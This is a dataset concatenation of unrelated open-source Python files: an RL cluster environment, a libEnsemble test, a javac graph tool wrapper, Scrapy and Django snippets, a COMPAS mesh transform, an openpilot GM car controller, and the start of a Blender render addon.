<reponame>Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master import numpy as np import pandas as pd import random import time import sys if sys.version_info.major == 2: import Tkinter as tk else: import tkinter as tk class Cluster(tk.Tk, object): def __init__(self, state_init, server_attribute): super(Cluster, self).__init__() self.action_space = np.array([[0,0],[0,1],[0,2],[0,3], [1,0],[1,1],[1,2],[1,3], [2,0],[2,1],[2,2],[2,3], [3,0],[3,1],[3,2],[3,3], [4,0],[4,1],[4,2],[4,3], [5,0],[5,1],[5,2],[5,3], [6,0],[6,1],[6,2],[6,3], [7,0],[7,1],[7,2],[7,3], [8,0],[8,1],[8,2],[8,3], [9,0],[9,1],[9,2],[9,3], [10,0],[10,1],[10,2],[10,3], [11,0],[11,1],[11,2],[11,3]]) self.n_actions = len(self.action_space) self.cost_matrix = pd.DataFrame(np.array([[0,1,5,12], [1,0,4,2], [5,4,0,3], [12,2,3,0]]), columns=[0, 1, 2, 3]) self.server_attribute = server_attribute self.QSs = self.read_file() self.state_init = state_init self.cost_init = self.cost_init() def step(self, action, state, costs): s = state.copy() #action_real[查询,移动到的服务器] action_real = self.action_space[action] q = action_real[0] index_server = action_real[1] s.iloc[q, :] = 0 s.iloc[q, index_server] = 1 cost_new = self.cost_caculate(q, index_server) if cost_new > costs[q]: is_better = True else: is_better = False # costs[action_real[0]] = cost_new costs[q] = cost_new cost_all = self.cost_all(costs) reward = self.reward(cost_all, s) s_ = s return s_, costs, reward, cost_all, is_better #判断结束的条件 选择的action在执行之后状态仍然没有变 or 判断状态是否在处与某种情况下,例如负载不平衡 def is_finish(self): # TODO return True # read the file and store in an array[query,[server1,server2,......]] def read_file(self): server_attribute = self.server_attribute with open("D:\SynologyDrive\Reinforcement-learning-with-tensorflow-master\contents\MyExperiment\Exp3_test\QueryAttribute_test",'r') as f: content = f.readlines() QSs = [] for item in content: QS = [] item = item.strip("\n") q = item.split(",")[0] targetAttribute = item.split(",")[1:] targetAttribute = list(map(int, targetAttribute)) servers = [] for attribute in targetAttribute: server = server_attribute[server_attribute.loc[:, attribute] == 1].index[0] servers.append(server) QS.append(int(q)) QS.append(servers) QSs.append(QS) return QSs # compute the initial costs array based on the initial state matrix. every element represent the total cost of the query def cost_init(self): state_init = self.state_init # print(len(state_init)) states = self.state_array(state_init) # print(len(states)) costs = [] # print(len(state_init)) for i in range(len(state_init)): index_server = states[i][1] cost = self.cost_caculate(i, index_server) costs.append(cost) return costs def cost_caculate(self,q,index_server): cost = 0 for j in range(len(self.QSs[q][1])): target_server = self.QSs[q][1][j] cost += self.cost_matrix.iloc[index_server, target_server] return cost # create the initial state matrix(random) # compute the total reward based on the costs array def cost_all(self, costs): cost_all = 0 for i in range(len(costs)): cost_all += costs[i] return cost_all def reward(self, cost_all, state): list = [] for i in state.columns: list.append(state[i].sum()) load_weight_var = np.var(list) reward = (len(state)/cost_all) * self.function(1.1, load_weight_var) return reward def function(self, a, x): y = 100/(a**x) return y # transform the state matrix into array def state_array(self, state): states = [] for i in range(len(state)): for j in range(len(state.columns)): state_arr = [] if state.iloc[i, j] == 1: state_arr.append(i) state_arr.append(j) states.append(state_arr) return states def state_init(): init_state = pd.DataFrame(np.zeros(327*8).reshape(327, 8), columns=[0, 1, 2, 3, 4, 5, 6, 7]) for i in range(len(init_state)): j = random.randint(0, 7) init_state.iloc[i][j] = 1 return init_state # if __name__ == '__main__': # server_attribute = pd.DataFrame(np.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, # 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, # 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, # 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, # 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, # 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, # 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, # 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]). # reshape(8, 24), # columns=np.arange(24)) # env = Cluster(state_init(), server_attribute) # Qss = env.QSs # print(Qss) # for i in range(len(Qss)): # q = i # for j in range(len(server_attribute)): # index_server = j # print(env.cost_init) # print("The reward of initial state is:") # print(env.reward(env.cost_all(env.cost_init), env.state_init)) # print(env.state_init) # actions=list(range(env.n_actions)) # print(actions) # env.after(100, update) # env.mainloop()
2.828125
3
libensemble/tests/regression_tests/test_6-hump_camel_elapsed_time_abort.py
Kardyne/libensemble
0
16727
<filename>libensemble/tests/regression_tests/test_6-hump_camel_elapsed_time_abort.py<gh_stars>0 # """ # Runs libEnsemble on the 6-hump camel problem. Documented here: # https://www.sfu.ca/~ssurjano/camel6.html # # Execute via the following command: # mpiexec -np 4 python3 test_6-hump_camel_elapsed_time_abort.py # The number of concurrent evaluations of the objective function will be 4-1=3. # """ from __future__ import division from __future__ import absolute_import from __future__ import print_function from mpi4py import MPI # for libE communicator import sys, os # for adding to path import numpy as np # Import libEnsemble main from libensemble.libE import libE # Import sim_func from libensemble.sim_funcs.six_hump_camel import six_hump_camel # Import gen_func from libensemble.gen_funcs.uniform_sampling import uniform_random_sample def eprint(*args, **kwargs): print(*args, file=sys.stderr, **kwargs) script_name = os.path.splitext(os.path.basename(__file__))[0] #State the objective function, its arguments, output, and necessary parameters (and their sizes) sim_specs = {'sim_f': six_hump_camel, # This is the function whose output is being minimized 'in': ['x'], # These keys will be given to the above function 'out': [('f',float), # This is the output from the function being minimized ], 'pause_time': 2, # 'save_every_k': 10 } # State the generating function, its arguments, output, and necessary parameters. gen_specs = {'gen_f': uniform_random_sample, 'in': ['sim_id'], 'out': [('x',float,2), ], 'lb': np.array([-3,-2]), 'ub': np.array([ 3, 2]), 'gen_batch_size': 5, 'num_active_gens': 1, 'batch_mode': False, # 'save_every_k': 10 } # Tell libEnsemble when to stop exit_criteria = {'elapsed_wallclock_time': 1} np.random.seed(1) persis_info = {} for i in range(MPI.COMM_WORLD.Get_size()): persis_info[i] = {'rand_stream': np.random.RandomState(i)} # Perform the run H, persis_info, flag = libE(sim_specs, gen_specs, exit_criteria, persis_info) if MPI.COMM_WORLD.Get_rank() == 0: eprint(flag) eprint(H) assert flag == 2 short_name = script_name.split("test_", 1).pop() filename = short_name + '_results_History_length=' + str(len(H)) + '_evals=' + str(sum(H['returned'])) + '_ranks=' + str(MPI.COMM_WORLD.Get_size()) print("\n\n\nRun completed.\nSaving results to file: " + filename) # if flag == 2: # print("\n\n\nKilling COMM_WORLD") # MPI.COMM_WORLD.Abort()
2.46875
2
do_like_javac/tools/graphtools.py
zcai1/do-like-javac
1
16728
import os import argparse from . import common argparser = argparse.ArgumentParser(add_help=False) graph_group = argparser.add_argument_group('graphtool arguments') graph_group.add_argument('--graph-jar', metavar='<graphtool-jar>', action='store',default=None, dest='graph_jar', help='Path to prog2dfg.jar or apilearner.jar') def run(args, javac_commands, jars): if not args.graph_jar: print("Could not run graph tool: missing arg --graph-jar") return tool_command = ["java", "-jar", args.graph_jar] dot_dir = os.path.join(args.output_directory, "dot") if not os.path.isdir(dot_dir): os.makedirs(dot_dir) for jc in javac_commands: java_files = jc['java_files'] java_files_file = os.path.join(os.getcwd(), '__java_file_names.txt') class_dir = common.class_directory(jc) with open(java_files_file, 'w') as f: for s in java_files: f.write(s) f.write("\n") current_outdir = os.path.join(dot_dir, class_dir.replace(os.getcwd(),'').replace(os.sep,"_")) cmd = tool_command + ["-o", current_outdir, "-j", class_dir, "-all", "-source", java_files_file] common.run_cmd(cmd, args, 'graphtools')
2.6875
3
boss_grabbing/pipelines.py
shansb/boss_grabbing
0
16729
<reponame>shansb/boss_grabbing<filename>boss_grabbing/pipelines.py # -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html from boss_grabbing.sqlite import Sqlite class BossGrabbingPipeline(object): def process_item(self, item, spider): print("process") count = Sqlite.select_db(item['url'])[0][0] print("count:" + str(count)) if count == 0: Sqlite.insert_db(item) return item
2.375
2
core/jobs/urls.py
InKyrNet/inkyrnet
0
16730
from django.urls import path from .views import * from django_filters.views import FilterView app_name = 'jobs' urlpatterns = [ path('', FilterView.as_view(filterset_class=JobFilter, template_name='jobs/job_list.html'), name='index'), path('companies/', CompanyListView.as_view(), name='companies'), ]
1.804688
2
src/compas/datastructures/mesh/transformations_numpy.py
arpastrana/compas
2
16731
from __future__ import print_function from __future__ import absolute_import from __future__ import division from compas.geometry import transform_points_numpy __all__ = [ 'mesh_transform_numpy', 'mesh_transformed_numpy', ] def mesh_transform_numpy(mesh, transformation): """Transform a mesh. Parameters ---------- mesh : compas.datastructures.Mesh The mesh. transformation : compas.geometry.Transformation The transformation. Notes ----- The mesh is modified in-place. Examples -------- >>> mesh = Mesh.from_obj(compas.get('cube.obj')) >>> T = matrix_from_axis_and_angle([0, 0, 1], pi / 4) >>> tmesh = mesh.copy() >>> mesh_transform(tmesh, T) """ vertices = list(mesh.vertices()) xyz = [mesh.vertex_coordinates(vertex) for vertex in vertices] xyz[:] = transform_points_numpy(xyz, transformation) for index, vertex in enumerate(vertices): mesh.vertex_attributes(vertex, 'xyz', xyz[index]) def mesh_transformed_numpy(mesh, transformation): """Transform a copy of ``mesh``. Parameters ---------- mesh : compas.datastructures.Mesh The mesh. transformation : compas.geometry.Transformation The transformation. Returns ------- Mesh A transformed independent copy of ``mesh``. Notes ----- The original mesh is not modified. Instead a transformed independent copy is returned. Examples -------- >>> mesh = Mesh.from_obj(compas.get('cube.obj')) >>> T = matrix_from_axis_and_angle([0, 0, 1], pi / 4) >>> tmesh = mesh_transformed(mesh, T) """ mesh_copy = mesh.copy() mesh_transform_numpy(mesh_copy, transformation) return mesh_copy # ============================================================================== # Main # ============================================================================== if __name__ == "__main__": import doctest doctest.testmod(globs=globals())
2.765625
3
selfdrive/car/gm/carcontroller.py
CTyrell/openpilot
0
16732
from cereal import car from common.realtime import DT_CTRL from common.numpy_fast import interp from common.realtime import sec_since_boot from selfdrive.config import Conversions as CV from selfdrive.car import apply_std_steer_torque_limits from selfdrive.car.gm import gmcan from selfdrive.car.gm.values import DBC, AccState, CanBus, CarControllerParams from opendbc.can.packer import CANPacker VisualAlert = car.CarControl.HUDControl.VisualAlert class CarController(): def __init__(self, dbc_name, CP, VM): self.start_time = 0. self.apply_steer_last = 0 self.lka_steering_cmd_counter_last = -1 self.lka_icon_status_last = (False, False) self.steer_rate_limited = False self.fcw_count = 0 self.params = CarControllerParams() self.packer_pt = CANPacker(DBC[CP.carFingerprint]['pt']) self.packer_obj = CANPacker(DBC[CP.carFingerprint]['radar']) self.packer_ch = CANPacker(DBC[CP.carFingerprint]['chassis']) self.debug_logging = False self.debug_log_time_step = 0.333 self.last_debug_log_t = 0. if self.debug_logging: with open("/data/openpilot/coast_debug.csv","w") as f: f.write(",".join([ "t", "long plan", "d (m/s)", "v", "vEgo", "v_cruise", "v (mph)", "vEgo (mph)", "v_cruise (mph)", "ttc", "coast gas lockout", "coast brake lockout", "gas in", "brake in", "one-pedal", "coasting enabled", "no f brakes", "gas out", "brake out"]) + "\n") def update(self, enabled, CS, frame, actuators, hud_v_cruise, hud_show_lanes, hud_show_car, hud_alert): P = self.params # Send CAN commands. can_sends = [] # Steering (50Hz) # Avoid GM EPS faults when transmitting messages too close together: skip this transmit if we just received the # next Panda loopback confirmation in the current CS frame. if CS.lka_steering_cmd_counter != self.lka_steering_cmd_counter_last: self.lka_steering_cmd_counter_last = CS.lka_steering_cmd_counter elif (frame % P.STEER_STEP) == 0: lkas_enabled = (enabled or CS.pause_long_on_gas_press) and CS.lkMode and not (CS.out.steerWarning or CS.out.steerError) and CS.out.vEgo > P.MIN_STEER_SPEED and CS.lane_change_steer_factor > 0. if lkas_enabled: new_steer = int(round(actuators.steer * P.STEER_MAX * CS.lane_change_steer_factor)) apply_steer = apply_std_steer_torque_limits(new_steer, self.apply_steer_last, CS.out.steeringTorque, P) self.steer_rate_limited = new_steer != apply_steer else: apply_steer = 0 self.apply_steer_last = apply_steer # GM EPS faults on any gap in received message counters. To handle transient OP/Panda safety sync issues at the # moment of disengaging, increment the counter based on the last message known to pass Panda safety checks. idx = (CS.lka_steering_cmd_counter + 1) % 4 can_sends.append(gmcan.create_steering_control(self.packer_pt, CanBus.POWERTRAIN, apply_steer, idx, lkas_enabled)) # Gas/regen prep if not enabled or CS.pause_long_on_gas_press: # Stock ECU sends max regen when not enabled. apply_gas = P.MAX_ACC_REGEN apply_brake = 0 else: apply_gas = interp(actuators.accel, P.GAS_LOOKUP_BP, P.GAS_LOOKUP_V) apply_brake = interp(actuators.accel, P.BRAKE_LOOKUP_BP, P.BRAKE_LOOKUP_V) t = sec_since_boot() v_rel = CS.coasting_lead_v - CS.vEgo ttc = min(-CS.coasting_lead_d / v_rel if (CS.coasting_lead_d > 0. and v_rel < 0.) else 100.,100.) d_time = CS.coasting_lead_d / CS.vEgo if (CS.coasting_lead_d > 0. and CS.vEgo > 0. and CS.tr > 0.) else 10. if CS.coasting_lead_d > 0. and (ttc < CS.lead_ttc_long_gas_lockout_bp[-1] \ or v_rel < CS.lead_v_rel_long_gas_lockout_bp[-1] \ or CS.coasting_lead_v < CS.lead_v_long_gas_lockout_bp[-1] \ or d_time < CS.tr * CS.lead_tr_long_gas_lockout_bp[-1]\ or CS.coasting_lead_d < CS.lead_d_long_gas_lockout_bp[-1]): lead_long_gas_lockout_factor = max([ interp(v_rel, CS.lead_v_rel_long_gas_lockout_bp, CS.lead_v_rel_long_gas_lockout_v), interp(CS.coasting_lead_v, CS.lead_v_long_gas_lockout_bp, CS.lead_v_long_gas_lockout_v), interp(ttc, CS.lead_ttc_long_gas_lockout_bp, CS.lead_ttc_long_gas_lockout_v), interp(d_time / CS.tr, CS.lead_tr_long_gas_lockout_bp, CS.lead_tr_long_gas_lockout_v), interp(CS.coasting_lead_d, CS.lead_d_long_gas_lockout_bp, CS.lead_d_long_gas_lockout_v)]) if CS.coasting_lead_d > 0. and (ttc < CS.lead_ttc_long_brake_lockout_bp[-1] \ or v_rel < CS.lead_v_rel_long_brake_lockout_bp[-1] \ or CS.coasting_lead_v < CS.lead_v_long_brake_lockout_bp[-1] \ or d_time < CS.tr * CS.lead_tr_long_brake_lockout_bp[-1]\ or CS.coasting_lead_d < CS.lead_d_long_brake_lockout_bp[-1]): lead_long_brake_lockout_factor = max([ interp(v_rel, CS.lead_v_rel_long_brake_lockout_bp, CS.lead_v_rel_long_brake_lockout_v), interp(CS.coasting_lead_v, CS.lead_v_long_brake_lockout_bp, CS.lead_v_long_brake_lockout_v), interp(ttc, CS.lead_ttc_long_brake_lockout_bp, CS.lead_ttc_long_brake_lockout_v), interp(d_time / CS.tr, CS.lead_tr_long_brake_lockout_bp, CS.lead_tr_long_brake_lockout_v), interp(CS.coasting_lead_d, CS.lead_d_long_brake_lockout_bp, CS.lead_d_long_brake_lockout_v)]) else: lead_long_brake_lockout_factor = 0. # 1.0 means regular braking logic is completely unaltered, 0.0 means no cruise braking else: lead_long_gas_lockout_factor = 0. # 1.0 means regular braking logic is completely unaltered, 0.0 means no cruise braking lead_long_brake_lockout_factor = 0. # 1.0 means regular braking logic is completely unaltered, 0.0 means no cruise braking # debug logging do_log = self.debug_logging and (t - self.last_debug_log_t > self.debug_log_time_step) if do_log: self.last_debug_log_t = t f = open("/data/openpilot/coast_debug.csv","a") f.write(",".join([f"{i:.1f}" if i == float else str(i) for i in [ t - CS.sessionInitTime, CS.coasting_long_plan, CS.coasting_lead_d, CS.coasting_lead_v, CS.vEgo, CS.v_cruise_kph * CV.KPH_TO_MS, CS.coasting_lead_v * CV.MS_TO_MPH, CS.vEgo * CV.MS_TO_MPH, CS.v_cruise_kph * CV.KPH_TO_MPH, ttc, lead_long_gas_lockout_factor, lead_long_brake_lockout_factor, int(apply_gas), int(apply_brake), (CS.one_pedal_mode_active or CS.coast_one_pedal_mode_active), CS.coasting_enabled, CS.no_friction_braking]]) + ",") if (CS.one_pedal_mode_active or CS.coast_one_pedal_mode_active): if not CS.one_pedal_mode_active and CS.gear_shifter_ev == 4 and CS.one_pedal_dl_coasting_enabled and CS.vEgo > 0.05: apply_gas = apply_gas * lead_long_gas_lockout_factor + float(P.ZERO_GAS ) * (1. - lead_long_gas_lockout_factor) else: apply_gas = apply_gas * lead_long_gas_lockout_factor + float(P.MAX_ACC_REGEN) * (1. - lead_long_gas_lockout_factor) time_since_brake = t - CS.one_pedal_mode_last_gas_press_t if CS.one_pedal_mode_active: if abs(CS.angle_steers) > CS.one_pedal_angle_steers_cutoff_bp[0]: one_pedal_apply_brake = interp(CS.vEgo, CS.one_pedal_mode_stop_apply_brake_bp[CS.one_pedal_brake_mode], CS.one_pedal_mode_stop_apply_brake_v[CS.one_pedal_brake_mode]) one_pedal_apply_brake_minus1 = interp(CS.vEgo, CS.one_pedal_mode_stop_apply_brake_bp[max(0,CS.one_pedal_brake_mode-1)], CS.one_pedal_mode_stop_apply_brake_v[max(0,CS.one_pedal_brake_mode-1)]) one_pedal_apply_brake = interp(abs(CS.angle_steers), CS.one_pedal_angle_steers_cutoff_bp, [one_pedal_apply_brake, one_pedal_apply_brake_minus1]) else: one_pedal_apply_brake = interp(CS.vEgo, CS.one_pedal_mode_stop_apply_brake_bp[CS.one_pedal_brake_mode], CS.one_pedal_mode_stop_apply_brake_v[CS.one_pedal_brake_mode]) one_pedal_apply_brake *= interp(CS.pitch, CS.one_pedal_pitch_brake_adjust_bp, CS.one_pedal_pitch_brake_adjust_v[CS.one_pedal_brake_mode]) one_pedal_apply_brake = min(one_pedal_apply_brake, float(P.BRAKE_LOOKUP_V[0])) one_pedal_apply_brake *= interp(time_since_brake, CS.one_pedal_mode_ramp_time_bp, CS.one_pedal_mode_ramp_time_v) if CS.one_pedal_brake_mode < 2 else 1. else: one_pedal_apply_brake = 0. # ramp braking if CS.one_pedal_mode_active_last and time_since_brake > CS.one_pedal_mode_ramp_time_bp[-1]: if CS.one_pedal_mode_apply_brake != one_pedal_apply_brake: if CS.one_pedal_mode_ramp_mode_last != CS.one_pedal_brake_mode: # brake mode changed, so need to calculate new step based on the old and new modes old_apply_brake = interp(CS.vEgo, CS.one_pedal_mode_stop_apply_brake_bp[CS.one_pedal_mode_ramp_mode_last], CS.one_pedal_mode_stop_apply_brake_v[CS.one_pedal_mode_ramp_mode_last]) CS.one_pedal_mode_ramp_time_step = (one_pedal_apply_brake - old_apply_brake) / (CS.one_pedal_mode_ramp_duration * (2. if CS.one_pedal_mode_apply_brake > one_pedal_apply_brake else 1.)) if CS.one_pedal_mode_apply_brake < one_pedal_apply_brake: if CS.one_pedal_mode_ramp_time_step < 0.: CS.one_pedal_mode_ramp_time_step *= -1. CS.one_pedal_mode_apply_brake = max(one_pedal_apply_brake, CS.one_pedal_mode_apply_brake + CS.one_pedal_mode_ramp_time_step * (t - CS.one_pedal_mode_ramp_t_last)) else: if CS.one_pedal_mode_ramp_time_step > 0.: CS.one_pedal_mode_ramp_time_step *= -1. CS.one_pedal_mode_apply_brake = min(one_pedal_apply_brake, CS.one_pedal_mode_apply_brake + CS.one_pedal_mode_ramp_time_step * (t - CS.one_pedal_mode_ramp_t_last)) one_pedal_apply_brake = CS.one_pedal_mode_apply_brake else: CS.one_pedal_mode_apply_brake = one_pedal_apply_brake CS.one_pedal_mode_active_last = True CS.one_pedal_mode_ramp_t_last = t CS.one_pedal_mode_ramp_mode_last = CS.one_pedal_brake_mode if CS.one_pedal_mode_op_braking_allowed and CS.coasting_long_plan not in ['cruise', 'limit']: apply_brake = max(one_pedal_apply_brake, apply_brake * lead_long_brake_lockout_factor) else: apply_brake = one_pedal_apply_brake elif CS.coasting_enabled and lead_long_brake_lockout_factor < 1.: if CS.coasting_long_plan in ['cruise', 'limit'] and apply_gas < P.ZERO_GAS or apply_brake > 0.: check_speed_ms = (CS.speed_limit if CS.speed_limit_active and CS.speed_limit < CS.v_cruise_kph else CS.v_cruise_kph) * CV.KPH_TO_MS if apply_brake > 0.: coasting_over_speed_vEgo_BP = [ interp(CS.vEgo, CS.coasting_over_speed_vEgo_BP_BP, CS.coasting_over_speed_vEgo_BP[0]), interp(CS.vEgo, CS.coasting_over_speed_vEgo_BP_BP, CS.coasting_over_speed_vEgo_BP[1]) ] over_speed_factor = interp(CS.vEgo / check_speed_ms, coasting_over_speed_vEgo_BP, [0., 1.]) if (check_speed_ms > 0. and CS.coasting_brake_over_speed_enabled) else 0. over_speed_brake = apply_brake * over_speed_factor apply_brake = max([apply_brake * lead_long_brake_lockout_factor, over_speed_brake]) if apply_gas < P.ZERO_GAS and lead_long_gas_lockout_factor < 1.: coasting_over_speed_vEgo_BP = [ interp(CS.vEgo, CS.coasting_over_speed_vEgo_BP_BP, CS.coasting_over_speed_regen_vEgo_BP[0]), interp(CS.vEgo, CS.coasting_over_speed_vEgo_BP_BP, CS.coasting_over_speed_regen_vEgo_BP[1]) ] over_speed_factor = interp(CS.vEgo / check_speed_ms, coasting_over_speed_vEgo_BP, [0., 1.]) if (check_speed_ms > 0 and CS.coasting_brake_over_speed_enabled) else 0. coast_apply_gas = int(round(float(P.ZERO_GAS) - over_speed_factor * (P.ZERO_GAS - apply_gas))) apply_gas = apply_gas * lead_long_gas_lockout_factor + coast_apply_gas * (1. - lead_long_gas_lockout_factor) elif CS.no_friction_braking and lead_long_brake_lockout_factor < 1.: if CS.coasting_long_plan in ['cruise', 'limit'] and apply_brake > 0.: apply_brake *= lead_long_brake_lockout_factor apply_gas = int(round(apply_gas)) apply_brake = int(round(apply_brake)) CS.one_pedal_mode_active_last = CS.one_pedal_mode_active if do_log: f.write(",".join([str(i) for i in [ apply_gas, apply_brake]]) + "\n") f.close() if CS.showBrakeIndicator: CS.apply_brake_percent = 0. if CS.vEgo > 0.1: if CS.out.cruiseState.enabled: if not CS.pause_long_on_gas_press: if apply_brake > 1: CS.apply_brake_percent = interp(apply_brake, [float(P.BRAKE_LOOKUP_V[-1]), float(P.BRAKE_LOOKUP_V[0])], [51., 100.]) elif (CS.one_pedal_mode_active or CS.coast_one_pedal_mode_active): CS.apply_brake_percent = interp(CS.hvb_wattage, CS.hvb_wattage_bp, [0., 50.]) elif apply_gas < P.ZERO_GAS: CS.apply_brake_percent = interp(apply_gas, [float(P.GAS_LOOKUP_V[0]), float(P.GAS_LOOKUP_V[1])], [51., 0.]) else: CS.apply_brake_percent = interp(CS.hvb_wattage, CS.hvb_wattage_bp, [0., 50.]) elif CS.is_ev and CS.out.brake == 0.: CS.apply_brake_percent = interp(CS.hvb_wattage, CS.hvb_wattage_bp, [0., 50.]) elif CS.out.brake > 0.: CS.apply_brake_percent = interp(CS.out.brake, [0., 0.5], [51., 100.]) elif CS.out.brake > 0.: CS.apply_brake_percent = interp(CS.out.brake, [0., 0.5], [51., 100.]) # Gas/regen and brakes - all at 25Hz if (frame % 4) == 0: idx = (frame // 4) % 4 if CS.cruiseMain and not enabled and CS.autoHold and CS.autoHoldActive and not CS.out.gasPressed and CS.out.gearShifter in ['drive','low'] and CS.out.vEgo < 0.02 and not CS.regenPaddlePressed: # Auto Hold State car_stopping = apply_gas < P.ZERO_GAS standstill = CS.pcm_acc_status == AccState.STANDSTILL at_full_stop = standstill and car_stopping near_stop = (CS.out.vEgo < P.NEAR_STOP_BRAKE_PHASE) and car_stopping can_sends.append(gmcan.create_friction_brake_command(self.packer_ch, CanBus.CHASSIS, apply_brake, idx, near_stop, at_full_stop)) CS.autoHoldActivated = True else: if CS.pause_long_on_gas_press: at_full_stop = False near_stop = False car_stopping = False standstill = False else: car_stopping = apply_gas < P.ZERO_GAS standstill = CS.pcm_acc_status == AccState.STANDSTILL at_full_stop = enabled and standstill and car_stopping near_stop = enabled and (CS.out.vEgo < P.NEAR_STOP_BRAKE_PHASE) and car_stopping can_sends.append(gmcan.create_friction_brake_command(self.packer_ch, CanBus.CHASSIS, apply_brake, idx, near_stop, at_full_stop)) CS.autoHoldActivated = False # Auto-resume from full stop by resetting ACC control acc_enabled = enabled if standstill and not car_stopping: acc_enabled = False can_sends.append(gmcan.create_gas_regen_command(self.packer_pt, CanBus.POWERTRAIN, apply_gas, idx, acc_enabled, at_full_stop)) # Send dashboard UI commands (ACC status), 25hz if (frame % 4) == 0: send_fcw = hud_alert == VisualAlert.fcw follow_level = CS.get_follow_level() can_sends.append(gmcan.create_acc_dashboard_command(self.packer_pt, CanBus.POWERTRAIN, enabled, hud_v_cruise * CV.MS_TO_KPH, hud_show_car, follow_level, send_fcw)) # Radar needs to know current speed and yaw rate (50hz), # and that ADAS is alive (10hz) time_and_headlights_step = 10 tt = frame * DT_CTRL if frame % time_and_headlights_step == 0: idx = (frame // time_and_headlights_step) % 4 can_sends.append(gmcan.create_adas_time_status(CanBus.OBSTACLE, int((tt - self.start_time) * 60), idx)) can_sends.append(gmcan.create_adas_headlights_status(self.packer_obj, CanBus.OBSTACLE)) speed_and_accelerometer_step = 2 if frame % speed_and_accelerometer_step == 0: idx = (frame // speed_and_accelerometer_step) % 4 can_sends.append(gmcan.create_adas_steering_status(CanBus.OBSTACLE, idx)) can_sends.append(gmcan.create_adas_accelerometer_speed_status(CanBus.OBSTACLE, CS.out.vEgo, idx)) if frame % P.ADAS_KEEPALIVE_STEP == 0: can_sends += gmcan.create_adas_keepalive(CanBus.POWERTRAIN) # Show green icon when LKA torque is applied, and # alarming orange icon when approaching torque limit. # If not sent again, LKA icon disappears in about 5 seconds. # Conveniently, sending camera message periodically also works as a keepalive. lka_active = CS.lkas_status == 1 lka_critical = lka_active and abs(actuators.steer) > 0.9 lka_icon_status = (lka_active, lka_critical) if frame % P.CAMERA_KEEPALIVE_STEP == 0 or lka_icon_status != self.lka_icon_status_last: steer_alert = hud_alert in [VisualAlert.steerRequired, VisualAlert.ldw] can_sends.append(gmcan.create_lka_icon_command(CanBus.SW_GMLAN, lka_active, lka_critical, steer_alert)) self.lka_icon_status_last = lka_icon_status return can_sends
2.15625
2
src/rprblender/__init__.py
ralic/RadeonProRenderBlenderAddon
1
16733
<filename>src/rprblender/__init__.py #********************************************************************** # Copyright 2020 Advanced Micro Devices, Inc # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #******************************************************************** import traceback import bpy bl_info = { "name": "Radeon ProRender", "author": "AMD", "version": (3, 1, 0), "blender": (2, 80, 0), "location": "Info header, render engine menu", "description": "Radeon ProRender rendering plugin for Blender 2.8x", "warning": "", "tracker_url": "", "wiki_url": "", "category": "Render" } version_build = "" from .utils import logging, version_updater from .utils import install_libs from .engine.engine import Engine from . import ( nodes, properties, ui, operators, material_library, ) from .engine.render_engine import RenderEngine from .engine.render_engine_2 import RenderEngine2 from .engine.preview_engine import PreviewEngine from .engine.viewport_engine import ViewportEngine from .engine.viewport_engine_2 import ViewportEngine2 from .engine.animation_engine import AnimationEngine, AnimationEngine2 from .engine.render_engine_hybrid import RenderEngine as RenderEngineHybrid from .engine.viewport_engine_hybrid import ViewportEngine as ViewportEngineHybrid from .engine.animation_engine_hybrid import AnimationEngine as AnimationEngineHybrid log = logging.Log(tag='init') log("Loading RPR addon {}".format(bl_info['version'])) render_engine_cls = { 'FULL': RenderEngine, 'HIGH': RenderEngineHybrid, 'MEDIUM': RenderEngineHybrid, 'LOW': RenderEngineHybrid, 'FULL2': RenderEngine2, } animation_engine_cls = { 'FULL': AnimationEngine, 'HIGH': AnimationEngineHybrid, 'MEDIUM': AnimationEngineHybrid, 'LOW': AnimationEngineHybrid, 'FULL2': AnimationEngine2, } viewport_engine_cls = { 'FULL': ViewportEngine, 'HIGH': ViewportEngineHybrid, 'MEDIUM': ViewportEngineHybrid, 'LOW': ViewportEngineHybrid, 'FULL2': ViewportEngine2, } class RPREngine(bpy.types.RenderEngine): """ Main class of Radeon ProRender render engine for Blender v2.80+ """ bl_idname = "RPR" bl_label = "Radeon ProRender" bl_use_preview = True bl_use_shading_nodes = True bl_use_shading_nodes_custom = False bl_info = "Radeon ProRender rendering plugin" engine: Engine = None def __del__(self): if isinstance(self.engine, ViewportEngine): self.engine.stop_render() log('__del__', self.as_pointer()) # final render def update(self, data, depsgraph): """ Called for final render """ log('update', self.as_pointer()) # TODO: We create for every view layer separate Engine. We should improve this by implementing sync_update() try: if self.is_preview: engine_cls = PreviewEngine elif self.is_animation: engine_cls = animation_engine_cls[depsgraph.scene.rpr.render_quality] else: engine_cls = render_engine_cls[depsgraph.scene.rpr.render_quality] self.engine = engine_cls(self) self.engine.sync(depsgraph) except Exception as e: log.error(e, 'EXCEPTION:', traceback.format_exc()) self.error_set(f"ERROR | {e}. Please see log for more details.") def render(self, depsgraph): """ Called with final render and preview """ log("render", self.as_pointer()) try: self.engine.render() except Exception as e: log.error(e, 'EXCEPTION:', traceback.format_exc()) self.error_set(f"ERROR | {e}. Please see log 